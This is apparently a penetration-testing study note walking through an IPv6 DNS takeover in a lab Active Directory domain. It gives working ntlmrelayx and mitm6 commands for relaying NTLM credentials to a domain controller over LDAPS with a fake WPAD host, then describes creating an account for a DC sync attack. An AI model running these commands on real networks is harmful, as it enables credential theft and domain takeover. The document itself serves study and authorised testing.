# IPV6 DNS takeover

This attack takes advantage of machines utilizing IPv4 while still having IPv6 active in their network adapter properties. When a machine is configured in this way, one question comes to mind. Who is the DNS for IPv6? Most of the time, nobody.

With this misconfiguration, an attacker can listen for any incoming IPv6 traffic, declaring themselves as the DNS for IPv6. Through this process, an attacker can gain authentication to the Domain Controller with LDAP (Lightweight Directory Access Protocol) or SMB (Server Message Block).

After an event occurs on the target network, normally a machine rebooting or starting-up for the day, it goes to the attacker. The attacker can now use said event to authenticate to the Domain Controller. This can all be done on a non-administrative user account.

The attacker can then wait for credentials to be used on the target network, being provided said credentials by leveraging NTLM (Windows New Technology Lan Manager).

The attacker can now LDAP relay the user credentials to the Domain Controller and login if the relayed credentials are that of a domain administrator. This now allows the attacker to create an account on the Domain Controller.

### Steps (run for small sprints <mark style="color:orange;">(5-10 mins only/ otherwise you can get outages)</mark>

1. Run ntlmrelayx
2. Run mitm6
3. On any even, we get an event (restart/login) which will be relayed
4. If an administrator logs in, it tries to create a new user account, which we can use to perform DC sync attack.

### 1. ntlmrelayx

```
impacket-ntlmrelayx -6 -t ldaps://192.168.138.136 -wh fakewpad.marvel.local -l lootme
```

<figure><img src="https://755681241-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fa5rXMZ1JAQhUeS7TtZkM%2Fuploads%2FdWTyst9fPOgKTj7wzRdg%2Fimage.png?alt=media&#x26;token=976f918e-a41c-4fae-94e9-477009cdc125" alt=""><figcaption></figcaption></figure>

| Flag / Parameter             | Meaning                                                                                                                             |
| ---------------------------- | ----------------------------------------------------------------------------------------------------------------------------------- |
| impacket-ntlmrelayx          | The Impacket tool used to relay NTLM authentication.                                                                                |
| `-6`                         | Enables **IPv6** support. This is crucial for IPv6 DNS takeover attacks.                                                            |
| `-t ldaps://192.168.138.136` | Target for the relay — in this case, a **LDAPS (LDAP over SSL)** server at the given IP.                                            |
| `-wh fakewpad.marvel.local`  | **WPAD (Web Proxy Auto-Discovery Protocol)** hostname to inject into the victim’s system or used for poisoning (fake proxy server). |
| `-l lootm`                   | Directory where **loot (dumped hashes, credentials, etc.)** will be saved.                                                          |

#### 🧠 What This Setup Is Doing:

* Listens for NTLM authentication over **IPv6**.
* Relays the authentication to the **LDAPS** server at `192.168.138.136`.
* Uses **fake WPAD** (`fakewpad.marvel.local`) to trick clients into sending NTLM auth.
* Stores captured credentials or data in the **`lootm`** directory.

This is part of a **WPAD + NTLM relay over IPv6** attack, commonly used in **enterprise environments with misconfigured DNS or IPv6-enabled clients**.

### 2. mitm6

#### Installation

<figure><img src="https://755681241-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fa5rXMZ1JAQhUeS7TtZkM%2Fuploads%2FDSafBuDHCoectakVjEWy%2Fimage.png?alt=media&#x26;token=9f04ff17-1603-4d9f-ba01-06b023f0ff58" alt=""><figcaption></figcaption></figure>

```
sudo apt install mitm6
```

#### Launch mitm6

<pre><code><strong>sudo mitm6 -d marvel.local
</strong></code></pre>

<figure><img src="https://755681241-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fa5rXMZ1JAQhUeS7TtZkM%2Fuploads%2FjmIwwuw7aMKQBmQwi2Hz%2Fimage.png?alt=media&#x26;token=83bb1365-cf1a-409e-a3de-3c745245fe83" alt=""><figcaption></figcaption></figure>

### 3. Force event (restart)

Like restart or login .and we will get a success message.

and we will have information regarding computers, groups, users etc. It has enumerated everything

<figure><img src="https://755681241-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fa5rXMZ1JAQhUeS7TtZkM%2Fuploads%2Fb3cOKU7hg1hbndsLQzGp%2Fimage.png?alt=media&#x26;token=d4a99339-9733-4ff3-bf0a-6fa3dfdfa8b6" alt=""><figcaption></figcaption></figure>

### DC sync attack

If an admin logs in some computer, it auto adds a user that can be used to perform DC sync attack. The newly added user will have enterprise admin access. <mark style="color:red;">(not working for me)</mark>

<figure><img src="https://755681241-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fa5rXMZ1JAQhUeS7TtZkM%2Fuploads%2FNdUXqJ7ox8C5zk9glBWI%2Fimage.png?alt=media&#x26;token=d2b0f05e-d3cf-441c-a57e-4a2b0024a1cc" alt=""><figcaption></figcaption></figure>

{% embed url="<https://www.evolvesecurity.com/blog-posts/tools-of-the-trade-ipv6-dns-takeover-with-mitm6>" %}

{% embed url="<https://redfoxsec.com/blog/ipv6-dns-takeover/>" %}